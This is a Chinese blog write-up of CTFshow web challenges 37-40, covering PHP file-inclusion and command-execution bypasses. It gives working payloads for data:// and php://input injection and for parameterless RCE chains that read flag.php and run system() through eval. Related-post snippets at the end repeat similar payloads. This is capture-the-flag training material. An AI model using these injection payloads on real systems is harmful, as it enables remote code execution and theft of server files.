CTFshow 命令执行 web37-web40

已于 2024-10-06 15:37:15 修改
阅读量1k 收藏 11
点赞数 20
分类专栏: ctfshow 文章标签: 网络安全 web 命令执行
于 2024-10-06 15:23:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74312676/article/details/142671881
版权

目录

web37

方法一:php://input

 方法二:data协议

web38

web39

web40

 方法一:构造文件读取

 方法二:构造数组+rce

web37

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;
    
    }
        
}else{
    highlight_file(__FILE__);
}

过滤了flag字符,不区分大小写。

我们可以看到这里有include($c)函数,通过$c变量,我们可以将想要执行的指令传入,如果要用到filter协议的话,payload可以构造如下:

?c=php://filter/read=convert.base64-encode/resource=flag.php

 但是由于过滤规则,把flag过滤掉了,这里就不能使用filter协议了。

方法一:php://input

有多种方式来实现,最常见的是利用hacker插件,将想要传输的参数,以post的方式传输

 也可以利用burpsuite来实现

 方法二:data协议

?c=data://text/plain,<?php system('tac f*');?>

 也可以将要传入的的命令加密之后才传入,并指明加密的类型。如这里采用base64的加密方式,

?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZionKTs/Pg==

web38

if(!preg_match("/flag|php|file/i", $c))

可以看到把,flag,php,file都过滤掉了,多了对php的过滤,于是就只能

?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZionKTs/Pg==

web39

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c.".php");
    }
        
}else{
    highlight_file(__FILE__);
}

 include函数表示,在输入的参数c后面加上.php,解法同web38

?c=data://text/plain,<?php system('tac f*');?>

web40

我们可以看到过滤了好多的符号,最重要的是单双引号,斜杠、逗号、以及$都过滤掉了,这意味着我们之前的哪些方法都用不了了。但是值得一提的是,这里过滤掉的是中文括号,英文括号并没有被过滤掉。

 方法一:构造文件读取

 于是这里我们要用到许多的函数:

localeconv():返回包含本地数字及货币信息格式的数组。其中数组中的第一个为点号(.)

pos():返回数组中的当前元素的值。current()与其相似。

scandir():获取目录下的文件。

array_reverse():数组逆序。

next():函数将内部指针指向数组中的下一个元素,并输出。

print_r():函数用于打印变量,作用对象是变量

show_source():对文件进行 PHP 语法高亮显示。语法通过使用 HTML 标签进行高亮,作用对象是文件

highlight_file():跟show_source()类似。

 开始解题:

(1)首先我们看看localeconv()的返回值是什么:

 localeconv() 函数返回的 lconv 结构体的内容。这个结构体包含了与区域设置(locale)相关的数值和字符串信息,用于货币和数字的格式化。

(2)再用pos或者current函数返回数组当前元素的值:

?c=print_r(pos(localeconv()));

 得到的是一个点:

(3)使用scandir('.')获得当前目录下的文件:

?c=print_r(scandir(pos(localeconv())));

 

 可以看到目录下的文件,有flag.php文件

(4)使用array_reverse将文件目录反转

?c=print_r((array_reverse(scandir(current(localeconv())))));

 

(5)将反转后的目录使用next函数,将flag.php文件输出,值得注意的是,我们这里输出的对象是文件,前面用到的print_r函数输出的对象是参数,于是我们这里就只能用show_source或者highlight_file

 于是我们可以构造payload:

?c=show_source(next(array_reverse(scandir(current(localeconv())))));

 得到flag

 方法二:构造数组+rce

get_defined_vars() :函数返回由所有已定义变量所组成的数组。

 打印当前所有变量:print_r(get_defined_vars());

array_pop() 函数删除数组中的最后一个元素。

 拿到数组,再拿数组值,数组弹出并打印:print(array_pop(next(get_defined_vars())));

payload:
eval(array_pop(next(get_defined_vars())));
post传参:1=system("tac fla?.php");

 

参考博客:ctfshow-web入门——命令执行(1)(web29-web40)_ctfshwo web入门命令执行-CSDN博客

一路向北_.
关注
专栏目录
CTFshow 命令执行 web40
Kradress的博客
10-30 1755
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 06:03:36 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){ $c = $_GET['c'];
ctfshow 命令执行 web37-40
qq_44893894的博客
11-27 934
web37 关键代码: if(!preg_match("/flag/i", $c)){ include($c); echo $flag; } include (或 require)语句会获取指定文件中存在的所有文本/代码/标记,并复制到使用 include 语句的文件中。 伪协议中的data://,可以让用户来控制输入流,当它与包含函数结合时,用户输入的data://流会被当作php文件执行 data://协议用法: data://text/plain,
ctfshow-web40(命令执行)
m0_62094846的博客
01-22 6199
current() prev() next() reset() end() <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 06:03:36 # @email: h1xa@ctfer.com # @link: https://ctfer....
CTFSHOW web入门——web40
m0_74093152的博客
04-24 601
并且这道题使用到了eval函数(返回传入字符的表达式的结果。即将字符串当成有效的表达式,进行运算、求值并返回结果。构造payload:?过滤了一堆符号,但过滤的括号是中文的括号,所以还是可以正常使用英文括号的。并post参数:b=system(''tac flag.php)可以使用套娃去获得flag.php文件的内容。
【CTFWP】ctfshow-web40
最新发布
LongL_GuYu的博客
07-30 1092
CTFWP:ctfshow-web40
ctf.show_web40(命令执行)
高高同学
03-01 741
web40无参数RCE绕过 源码 <?php if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){ eval($c); } }else{ highligh
CTFshow web37 38 39 40
ChenD的学习笔记
11-08 922
CTFshow web37 web38 web39 web40
ctfshow-web入门-命令执行web37-web40
Welcome To Myon'Blog !
06-07 1938
中间件的日志文件会保存网站的访问记录,比如HTTP请求行,User-Agent,Referer等客户端信息,如果在HTTP请求中插入恶意代码,那么恶意代码就会保存到日志文件中,访问日志文件的时候,日志文件中的恶意代码就会执行,从而造成任意代码执行甚至获取shell。将我们想要执行的代码包含进去,其实和 php://input 是一样的,让用户可以控制输入流,当它与文件包含函数结合时,用户输入的 data:// 流就会被当作 php 文件执行。就会显示容器有问题了。我们也可以采用编码绕过,对
CTFshow--web入门--命令执行(29--55)
weixin_53425135的博客
11-23 2574
CTFshow–web入门 web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 过滤了flag,可以使用通配符进行绕过 : ?c=system(‘cat f*’); web30 <?p
ctfshow-web入门-命令执行-web31
HkD01L的博客
06-24 944
ctfshow,命令执行web31
ctfshow-web入门-命令执行-web30
HkD01L的博客
06-21 311
ctfshow,命令执行,web30
CTFSHOW WEB入门 命令执行 web29-web36
m0_53194713的博客
06-26 1364
ctfshow web29 web30 web31
CTFshow 命令执行 web37
Kradress的博客
10-29 151
源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 05:18:55 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ //flag in flag.php error_reporting(0); if(
CTFSHOW web入门——web37
m0_74093152的博客
04-24 307
include包含变量c,因此可以利用文件包含漏洞,让变量c变成php代码,然后通过include函数执行。可以使用data协议获取flag.php文件中的内容。上传payload:?过滤了flag,即c中不能有flag字段。
ctfshow-命令执行-web37
weixin_43400535的博客
11-03 2910
ctfshow-web37 文章目录ctfshow-web37题目描述:原理:审计:方法:思路:利用文件按包含漏洞,data协议Flag: 题目描述: 原理: 审计: <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 05:18:55 # @email: h1xa
ctfshow-web37(命令执行)
m0_62094846的博客
01-22 1764
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 05:18:55 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ //flag in flag.php error_reporting(0); if(i..
ctfshow-web入门-命令执行-web37
HkD01L的博客
06-25 428
ctf常用伪协议PHP伪协议总结_大方子的博客-CSDN博客_php伪协议PHP伪协议详解_Snakin_ya的博客-CSDN博客_php伪协议PHP伪协议大总结【欢迎收藏】-php教程-PHP中文网file_put_content和死亡·杂糅代码之缘 - 先知社区 这里不再是之前的eval(),不可以直接执行命令了考点:data伪协议?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZmxhZy5waHAnKTs/Pg== 后面这一串base64的
Ctfshow web入门-web37 WP
qq_45427131的博客
05-18 477
首先查看源代码 代码的意思是文件包含获取到的变量c的值,但是对变量c又有过滤,要求获取到的c中不包含flag 这个地方可以用data协议rce data协议: text/plain,<?php system(‘命令’);?> 构造payload : http://1332de51-f763-40f4-b931-c2ffaac051e5.challenge.ctf.show:8080/?c=data:text/plain,<?php system('ls');?> 查看当前目录
ctfshow web入门命令执行
09-05
在CTF中,web入门命令执行指的是通过Web应用程序的漏洞,将恶意的命令注入到应用程序中并执行。这样的攻击可以导致未经授权的访问和操纵应用程序的数据和功能。 根据引用中提供的信息,可以看到一些常见的双写绕过技巧,如分号、竖线、双与号等。这些技巧可以用来绕过应用程序对输入参数的限制,从而注入恶意的命令。 引用中提到的payload,其中使用了一个通用的命令执行函数"show_source"来显示指定文件的源代码。这个payload可以用来尝试执行"flag.php"文件的源代码。但前提是要知道有一个名为"flag.php"的文件存在。 另外,引用中提供了另一种payload的示例,其中使用了array_reverse和scandir函数来获取文件目录并显示指定文件的源代码。同样,也可以直接使用show_source('flag.php')来显示"flag.php"文件的源代码。 需要注意的是,命令执行漏洞是非常危险的,因为它可以导致恶意用户执行任意的系统命令。为了保护Web应用程序免受此类攻击,开发人员应该对用户的输入进行严格的验证和过滤,并使用安全的编程实践来防止命令注入漏洞的发生。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [ctfshow web入门之命令执行](https://blog.csdn.net/uuzfumo/article/details/128357863)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [CTFShow Web入门 命令执行](https://blog.csdn.net/qq_19533763/article/details/123910732)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值